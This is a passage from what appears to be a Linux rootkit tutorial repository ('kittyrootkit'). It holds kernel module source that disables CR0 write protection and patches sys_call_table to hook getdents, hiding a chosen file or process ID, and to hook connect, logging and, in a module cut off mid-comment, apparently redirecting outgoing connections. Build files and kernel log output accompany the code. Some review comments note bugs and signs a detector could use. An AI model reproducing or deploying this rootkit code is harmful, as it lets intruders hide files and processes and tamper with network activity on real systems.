    /* Error or end of directory: nothing to filter. */
    if (Records <= 0){
        return Records;
    }

    retn = (struct linux_dirent *) kmalloc(Records, GFP_KERNEL);
    // Copy the records from user space into our kernel-space buffer
    copy_from_user(retn, dirp, Records);

    dirp3 = retn;
    RemainingBytes = Records;


    while(RemainingBytes > 0){
        length = dirp3->d_reclen;
        RemainingBytes -= dirp3->d_reclen;

        printk(KERN_INFO "RemainingBytes %d \t File: %s " , RemainingBytes , dirp3->d_name );

        if(strcmp( (dirp3->d_name) , hide ) == 0){
            /* Move the records that follow over the matching one. */
            memcpy(dirp3, (char*)dirp3+dirp3->d_reclen, RemainingBytes);
            Records -= length; // dirp3->d_reclen; // leads to mistake?
        }
        dirp3 = (struct linux_dirent *) ((char *)dirp3 + dirp3->d_reclen);

    }
    // Copy the filtered records back to the caller's buffer
    copy_to_user(dirp, retn, Records);
    kfree(retn);
    return Records;
}


/*
 * Module init: resolve sys_call_table and point the getdents slot at
 * HookGetDents, keeping the previous entry in original_getdents.
 *
 * NOTE(review): the kallsyms_lookup_name() result is dereferenced without a
 * NULL check. The approach also depends on that symbol being callable from a
 * module and on write_cr0() accepting a cleared WP bit, neither of which
 * holds on current mainline kernels. A sys_call_table entry pointing outside
 * the kernel's own text is what syscall-table integrity checks look for.
 */
static int __init SetHooks(void) {
    // Look up the address of the syscall table
    SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table");

    printk(KERN_INFO "Hooks Will Be Set.\n");
    printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE);

    // Opens the memory pages to be written
    EnablePageWriting();

    // Save the current getdents entry, then install the hook.
    original_getdents = (void*)SYS_CALL_TABLE[__NR_getdents];
    SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)HookGetDents;
    DisablePageWriting();

    return 0;
}


/*
 * Module exit: put the saved getdents entry back into sys_call_table.
 */
static void __exit HookCleanup(void) {

    // Clean up our Hooks
    EnablePageWriting();
    SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)original_getdents;
    DisablePageWriting();
    printk(KERN_INFO "HooksCleaned Up!");
}

module_init(SetHooks);
module_exit(HookCleanup);

/*
Default -

Feb 2 12:45:28 ForeignHost kernel: [ 1670.710680] HooksCleaned Up!
Feb 2 12:45:28 ForeignHost kernel: [ 1685.668154] Hooks Will Be Set.
Feb 2 12:45:28 ForeignHost kernel: [ 1685.668155] System call table at 00000000a21b68dc
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104769] File Found .kittyrootkit.o.cmd
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104772] File Found .cache.mk
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104774] File Found .main.o.cmd
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104776] File Found main.o.ur-safe
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104778] File Found testfile
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104779] File Found modules.order
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104781] File Found kittyrootkit.ko
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104782] File Found Module.symvers
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104784] File Found kittyrootkit.mod.o
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104786] File Found .kittyrootkit.ko.cmd
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104787] File Found .vscode
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104789] File Found secRecordsfile.txt
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104790] File Found main.c
Feb 2 12:45:29 ForeignHost kernel: [ 1686.104791] File Found test.txt
Feb 2 12:45:29
ForeignHost kernel: [ 1686.104793] File Found .. 158 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104794] File Found kittyrootkit.o 159 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104796] File Found .kittyrootkit.mod.o.cmd 160 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104797] File Found main.o 161 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104799] File Found kittyrootkit.mod.c 162 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104800] File Found .RemainingBytes_versions 163 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104802] File Found . 164 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.921168] File Found . 165 | 166 | 167 | 168 | 169 | 170 | Should be - 171 | Feb 2 12:45:28 ForeignHost kernel: [ 1670.710680] HooksCleaned Up! 172 | Feb 2 12:45:28 ForeignHost kernel: [ 1685.668154] Hooks Will Be Set. 173 | Feb 2 12:45:28 ForeignHost kernel: [ 1685.668155] System call table at 00000000a21b68dc 174 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104769] File Found .kittyrootkit.o.cmd 175 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104772] File Found .cache.mk 176 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104774] File Found .main.o.cmd 177 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104776] File Found main.o.ur-safe 178 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104778] File Found testfile 179 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104779] File Found modules.order 180 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104781] File Found kittyrootkit.ko 181 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104782] File Found Module.symvers 182 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104784] File Found kittyrootkit.mod.o 183 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104786] File Found .kittyrootkit.ko.cmd 184 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104787] File Found .vscode 185 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104790] File Found main.c 186 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104791] File Found test.txt 187 | Feb 2 12:45:29 ForeignHost kernel: [ 
1686.104793] File Found .. 188 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104794] File Found kittyrootkit.o 189 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104796] File Found .kittyrootkit.mod.o.cmd 190 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104797] File Found main.o 191 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104799] File Found kittyrootkit.mod.c 192 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104800] File Found .RemainingBytes_versions 193 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104802] File Found . 194 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.921168] File Found . 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | Feb 1 22:37:45 ForeignHost kernel: [ 606.944551] Hooks Will Be Set. 211 | Feb 1 22:37:45 ForeignHost kernel: [ 606.944552] System call table at 000000003ea170af 212 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805231] File Found .kittyrootkit.o.cmd 213 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805235] File Found .cache.mk 214 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805237] File Found .main.o.cmd 215 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805239] File Found main.o.ur-safe 216 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805240] File Found testfile 217 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805242] File Found modules.order 218 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805243] File Found kittyrootkit.ko 219 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805245] File Found Module.symvers 220 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805247] File Found kittyrootkit.mod.o 221 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805248] File Found .kittyrootkit.ko.cmd 222 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805250] File Found .vscode 223 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805251] File Found .vscode 224 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805253] File Found main.c 225 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805254] File Found test.txt 226 | Feb 1 22:37:47 ForeignHost kernel: [ 
608.805256] File Found .. 227 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805257] File Found kittyrootkit.o 228 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805259] File Found .kittyrootkit.mod.o.cmd 229 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805260] File Found main.o 230 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805262] File Found kittyrootkit.mod.c 231 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805263] File Found .RemainingBytes_versions 232 | Feb 1 22:37:48 ForeignHost kernel: [ 608.805264] File Found . 233 | Feb 1 22:37:48 ForeignHost kernel: [ 610.146290] File Found . 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | */ -------------------------------------------------------------------------------- /module07_hooking_getdents/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-129 2 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-139 3 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-159 4 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-169 5 | -------------------------------------------------------------------------------- /module07_hooking_getdents/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 
2 | -------------------------------------------------------------------------------- /module07_hooking_getdents/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/Echo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | int count = 0; 8 | int main() { 9 | 10 | while(1) 11 | { 12 | count++; 13 | 14 | printf("Tick Tock -- Cycle %d \n", count ); 15 | usleep(1000000); 16 | 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/echo: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module08_hooking_getdents_hidePIDs/echo -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | 13 | 14 | MODULE_LICENSE("GPL"); 15 | MODULE_AUTHOR("SourceCodeDeleted"); 16 | MODULE_DESCRIPTION("Hide File Module"); 17 | MODULE_VERSION("1.0"); 18 | 19 | 20 | unsigned long **SYS_CALL_TABLE; 21 | 22 | 23 | 24 | void EnablePageWriting(void){ 25 | write_cr0(read_cr0() & (~0x10000)); 26 | 27 | } 28 | void DisablePageWriting(void){ 29 | write_cr0(read_cr0() | 0x10000); 30 | 31 | } 32 | 33 | 34 | 35 | //define our origional function. 36 | // Credit this author. 37 | // https://zuliu.me/2018/03/22/rootkit/ 38 | // My code was similar but had a few problems. Zuliu had a few better in his code. 39 | /* 40 | int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count); 41 | int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); 42 | */ 43 | 44 | 45 | struct linux_dirent { 46 | unsigned long d_ino; /* Inode number */ 47 | unsigned long d_off; /* Offset to next linux_dirent */ 48 | unsigned short d_reclen; // d_reclen is the way to tell the length of this entry 49 | char d_name[]; // the struct value is actually longer than this, and d_name is variable width. 50 | }*dirp2 , *dirp3 , *retn; // // dirp = directory pointer 51 | 52 | 53 | 54 | 55 | char hide[]="secretfile.txt"; 56 | char HidePID[]= "5779"; 57 | 58 | 59 | asmlinkage int ( *original_getdents ) (unsigned int fd, struct linux_dirent *dirp, unsigned int count); 60 | 61 | //Create Our version of Open Function. 
/*
 * HookGetDents - handler that SetHooks() installs in the __NR_getdents slot.
 *
 * Runs the saved original handler, copies the directory records it produced
 * from the caller's buffer into a kernel allocation, walks them, and removes
 * every record whose d_name equals HidePID before copying the buffer back.
 *
 * fd, dirp, count: forwarded unchanged to the original handler.
 * Returns the original handler's result when it is <= 0, otherwise that byte
 * count minus the d_reclen of each removed record.
 *
 * The comparison is on the entry name alone. The printk label and the name
 * HidePID suggest numeric /proc entries are meant, but nothing in this
 * function restricts the match to /proc.
 */
asmlinkage int HookGetDents(unsigned int fd, struct linux_dirent *dirp, unsigned int count){

  struct linux_dirent *retn, *dirp3;
  int Records, RemainingBytes, length;

  // Records is used below as a byte count (allocation size and copy length).
  Records = (*original_getdents) (fd, dirp, count);

  if (Records <= 0){
    return Records;
  }

  // NOTE(review): the kmalloc() result is used without a NULL check.
  retn = (struct linux_dirent *) kmalloc(Records, GFP_KERNEL);
  // Copy the records from the caller's buffer into the kernel allocation.
  // NOTE(review): the copy_from_user() return value (bytes not copied) is ignored.
  copy_from_user(retn, dirp, Records);

  dirp3 = retn;
  RemainingBytes = Records;


  while(RemainingBytes > 0){
    length = dirp3->d_reclen;
    RemainingBytes -= dirp3->d_reclen;

    // Every entry name seen by any caller is written to the kernel log at
    // KERN_INFO, so each directory listing leaves a trace there.
    printk(KERN_INFO "Process Name: %s " , dirp3->d_name );

    if(strcmp( (dirp3->d_name) , HidePID ) == 0){
      // Slide the remainder of the buffer down over the matching record.
      // NOTE(review): source and destination overlap, which memcpy() does not define.
      memcpy(dirp3, (char*)dirp3+dirp3->d_reclen, RemainingBytes);
      Records -= length;
    }

    // Steps by the d_reclen of whatever record is at dirp3 now; after a
    // removal that is the record just moved into place, which is therefore
    // never compared or logged.
    dirp3 = (struct linux_dirent *) ((char *)dirp3 + dirp3->d_reclen);

  }
  // Copy the (possibly shortened) records back to the caller's buffer.
  // NOTE(review): the copy_to_user() return value is ignored.
  copy_to_user(dirp, retn, Records);
  kfree(retn);
  return Records;
}


/*
 * SetHooks - module init. Replaces the __NR_getdents entry of the syscall
 * table with HookGetDents and keeps the previous pointer in
 * original_getdents. Always returns 0.
 *
 * What it leaves behind on the host: two KERN_INFO lines in the kernel log,
 * and a syscall-table slot holding the address of a function from this
 * module rather than the handler the kernel installed.
 */
static int __init SetHooks(void) {
  // Resolve the table by symbol name.
  // NOTE(review): the result is not checked; if the lookup returns 0 the
  // indexing below dereferences a NULL table pointer.
  SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table");

  printk(KERN_INFO "Hooks Will Be Set.\n");
  printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE);

  // EnablePageWriting()/DisablePageWriting() (defined earlier in this file)
  // clear and set bit 0x10000 of CR0, the x86 write-protect flag, around
  // the table write.
  EnablePageWriting();

  // Save the current __NR_getdents handler, then point the slot at the hook.
  original_getdents = (void*)SYS_CALL_TABLE[__NR_getdents];
  SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)HookGetDents;
  DisablePageWriting();

  return 0;
}


/*
 * HookCleanup - module exit. Writes the saved original_getdents pointer back
 * into the __NR_getdents slot, using the same CR0 toggle as SetHooks(), and
 * logs a message (the format string has no trailing newline).
 */
static void __exit HookCleanup(void) {

  // Restore the handler that was saved in SetHooks().
  EnablePageWriting();
  SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)original_getdents;
  DisablePageWriting();
  printk(KERN_INFO "HooksCleaned Up!");
}

module_init(SetHooks);
module_exit(HookCleanup);

-------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-119 2 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-129 3 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-149 4 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-159 5 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 
2 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/Echo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | int count = 0; 8 | int main() { 9 | 10 | while(1) 11 | { 12 | count++; 13 | 14 | printf("Tick Tock -- Cycle %d \n", count ); 15 | usleep(1000000); 16 | 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/echo: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module09_hooking_syscall_connect/echo -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | 14 | //#include 15 | #include 16 | #include 17 | #include 18 | 19 | 20 | 21 | MODULE_LICENSE("GPL"); 22 | MODULE_AUTHOR("SourceCodeDeleted"); 23 | MODULE_DESCRIPTION("Intercept Connection Module"); 24 | MODULE_VERSION("1.0"); 25 | 26 | 27 | unsigned long **SYS_CALL_TABLE; 28 | 29 | 30 | 31 | void EnablePageWriting(void){ 32 | write_cr0(read_cr0() & (~0x10000)); 33 | 34 | } 35 | void DisablePageWriting(void){ 36 | write_cr0(read_cr0() | 0x10000); 37 | 38 | } 39 | 40 | #define TCP 0x2 41 | #define UDP 0x1 42 | 43 | 44 | /* 45 | struct sockaddr_in { 46 | __kernel_sa_family_t sin_family; Address family 47 | __be16 sin_port; Port number 48 | struct in_addr sin_addr; Internet address 49 | 50 | Pad to size of `struct sockaddr'. 51 | unsigned char __pad[__SOCK_SIZE__ - sizeof(short int) - 52 | sizeof(unsigned short int) - sizeof(struct in_addr)]; 53 | }; 54 | 55 | In memory Ip addresses are stored like so 56 | 01.0.0.127 == 01 00 00 7f 57 | 58 | */ 59 | 60 | 61 | 62 | 63 | // Place to Store IP String 64 | unsigned char IP[32] = {'\0'}; 65 | 66 | // This function converts internet to Interger and returns String... 
/*
 * inet_ntoa - format a 32-bit IPv4 address value as dotted-decimal text.
 *
 * HexValue: the address as read from sin_addr.s_addr.
 * Returns a pointer to the file-scope buffer IP.
 *
 * The least significant byte of HexValue is printed first. Every call clears
 * and rewrites IP, so the returned pointer is only meaningful until the next
 * call and concurrent callers share the same buffer.
 * NOTE(review): IP is declared unsigned char[] while the return type and
 * snprintf() use char *.
 */
char * inet_ntoa(int HexValue){
  memset(IP, 0, sizeof(IP));

  unsigned char first = (HexValue >> 24) & 0xff;
  unsigned char second = (HexValue >> 16) & 0xff;
  unsigned char third = (HexValue >> 8) & 0xff;
  unsigned char fourth = HexValue & 0xff;

  // Element count of IP; IP holds one-byte elements, so this equals sizeof(IP).
  size_t size = sizeof(IP) / sizeof(IP[0]);
  snprintf(IP , size ,"%d.%d.%d.%d" , fourth, third , second , first);

  return IP;
}


// Saved pointer to the handler that was in the __NR_connect slot before SetHooks() ran.
asmlinkage int ( *original_Connect ) (int fd, struct sockaddr __user *uservaddr, int addrlen);

/*
 * HookConnect - handler that SetHooks() installs in the __NR_connect slot.
 *
 * Copies the caller's socket address into a local struct sockaddr_in, logs
 * the destination address and port, then calls the original handler with
 * the unmodified arguments and returns its result.
 *
 * NOTE(review): sizeof(struct sockaddr_in) bytes are read whatever addrlen
 * says, and the copy_from_user() return value is ignored, so addr may hold
 * uninitialised stack bytes when it is logged.
 * NOTE(review): PROTO is sin_family, an address family. With the TCP (0x2)
 * and UDP (0x1) macros defined earlier in this file, the "TCP" branch
 * matches AF_INET sockets of any transport and the "UDP" branch matches
 * family value 1, not UDP.
 */
asmlinkage int HookConnect(int fd, struct sockaddr __user *uservaddr, int addrlen){

  struct sockaddr_in addr;

  copy_from_user(&addr, uservaddr, sizeof(struct sockaddr_in));

  int IPHEX = addr.sin_addr.s_addr;
  // Raw sin_port value; it is not passed through ntohs() before being logged.
  unsigned short PORT = addr.sin_port;
  int PROTO = addr.sin_family;

  char *IpString = inet_ntoa(IPHEX);


  // Both printk() calls carry no KERN_* level and no trailing newline; each
  // outgoing connection on the host adds one of these lines to the kernel log.
  if(PROTO == TCP){
    printk("TCP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT );
  }
  if(PROTO == UDP){
    printk("UDP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT );



  }

  return ( *original_Connect ) (fd, uservaddr, addrlen);
}


/*
 * SetHooks - module init. Replaces the __NR_connect entry of the syscall
 * table with HookConnect and keeps the previous pointer in original_Connect.
 * Always returns 0.
 *
 * What it leaves behind on the host: two KERN_INFO lines in the kernel log,
 * and a syscall-table slot holding the address of a function from this
 * module rather than the handler the kernel installed.
 */
static int __init SetHooks(void) {
  // Resolve the table by symbol name.
  // NOTE(review): the result is not checked; if the lookup returns 0 the
  // indexing below dereferences a NULL table pointer.
  SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table");

  printk(KERN_INFO "Hooks Will Be Set.\n");
  printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE);

  // EnablePageWriting()/DisablePageWriting() (defined earlier in this file)
  // clear and set bit 0x10000 of CR0, the x86 write-protect flag, around
  // the table write.
  EnablePageWriting();

  // Save the current __NR_connect handler, then point the slot at the hook.
  original_Connect = (void*)SYS_CALL_TABLE[__NR_connect];
  SYS_CALL_TABLE[__NR_connect] = (unsigned long*)HookConnect;
  DisablePageWriting();

  return 0;
}


/*
 * HookCleanup - module exit. Writes the saved original_Connect pointer back
 * into the __NR_connect slot, using the same CR0 toggle as SetHooks(), and
 * logs a message (the format string has no trailing newline).
 */
static void __exit HookCleanup(void) {

  // Restore the handler that was saved in SetHooks().
  EnablePageWriting();
  SYS_CALL_TABLE[__NR_connect] = (unsigned long*)original_Connect;
  DisablePageWriting();
  printk(KERN_INFO "HooksCleaned Up!");
}

module_init(SetHooks);
module_exit(HookCleanup);



/*

https://github.com/torvalds/linux/blob/master/net/socket.c




int __sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen)
{
  int ret = -EBADF;
  struct fd f;

  f = fdget(fd);
  if (f.file) {
    struct sockaddr_storage address;

    ret = move_addr_to_kernel(uservaddr, addrlen, &address);
    if (!ret)
      ret = __sys_connect_file(f.file, &address, addrlen, 0);
    if (f.flags)
      fput(f.file);
  }

  return ret;
}

SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
  int, addrlen)
{
  return __sys_connect(fd, uservaddr, addrlen);
}


enum sock_type {
  SOCK_STREAM = 1,
  SOCK_DGRAM = 2,
  SOCK_RAW = 3,
  SOCK_RDM = 4,
  SOCK_SEQPACKET = 5,
  SOCK_DCCP = 6,
  SOCK_PACKET = 10,
};


retn from STRACE
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused)


*/
-------------------------------------------------------------------------------- /module09_hooking_syscall_connect/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-19 2 | 
/home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-39 3 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-49 4 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-9 5 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 2 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/Echo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | int count = 0; 8 | int main() { 9 | 10 | while(1) 11 | { 12 | count++; 13 | 14 | printf("Tick Tock -- Cycle %d \n", count ); 15 | usleep(1000000); 16 | 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := 
main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module10_hooking_syscall_connect_redirect/echo -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | 14 | //#include 15 | #include 16 | #include 17 | #include 18 | 19 | 20 | 21 | MODULE_LICENSE("GPL"); 22 | MODULE_AUTHOR("SourceCodeDeleted"); 23 | MODULE_DESCRIPTION("Intercept Connection Module"); 24 | MODULE_VERSION("1.0"); 25 | 26 | 27 | unsigned long **SYS_CALL_TABLE; 28 | 29 | 30 | 31 | void EnablePageWriting(void){ 32 | write_cr0(read_cr0() & (~0x10000)); 33 | 34 | } 35 | void DisablePageWriting(void){ 36 | write_cr0(read_cr0() | 0x10000); 37 | 38 | } 39 | 40 | #define TCP 0x2 41 | #define UDP 0x1 42 | 43 | 44 | /* 45 | struct sockaddr_in { 46 | __kernel_sa_family_t sin_family; Address family 47 | __be16 sin_port; Port number 48 | struct in_addr sin_addr; Internet address 49 | 50 | Pad to size of `struct sockaddr'. 
  unsigned char __pad[__SOCK_SIZE__ - sizeof(short int) -
      sizeof(unsigned short int) - sizeof(struct in_addr)];
};

In memory Ip addresses are stored like so
01.0.0.127 == 01 00 00 7f

*/




// Place to Store IP String
unsigned char IP[32] = {'\0'};

/*
 * inet_ntoa - format a 32-bit IPv4 address value as dotted-decimal text.
 *
 * HexValue: the address as read from sin_addr.s_addr.
 * Returns a pointer to the file-scope buffer IP.
 *
 * The least significant byte of HexValue is printed first. Every call clears
 * and rewrites IP, so the returned pointer is only meaningful until the next
 * call and concurrent callers share the same buffer.
 * NOTE(review): IP is declared unsigned char[] while the return type and
 * snprintf() use char *.
 */
char * inet_ntoa(int HexValue){
  memset(IP, 0, sizeof(IP));

  unsigned char first = (HexValue >> 24) & 0xff;
  unsigned char second = (HexValue >> 16) & 0xff;
  unsigned char third = (HexValue >> 8) & 0xff;
  unsigned char fourth = HexValue & 0xff;

  // Element count of IP; IP holds one-byte elements, so this equals sizeof(IP).
  size_t size = sizeof(IP) / sizeof(IP[0]);
  snprintf(IP , size ,"%d.%d.%d.%d" , fourth, third , second , first);

  return IP;
}


// Saved pointer to the handler that was in the __NR_connect slot before SetHooks() ran.
asmlinkage int ( *original_Connect ) (int fd, struct sockaddr __user *uservaddr, int addrlen);

/*
 * HookConnect - handler that SetHooks() installs in the __NR_connect slot.
 *
 * Copies the caller's socket address into a local struct sockaddr_in and
 * logs the destination. When the destination text is "127.0.0.1" and the
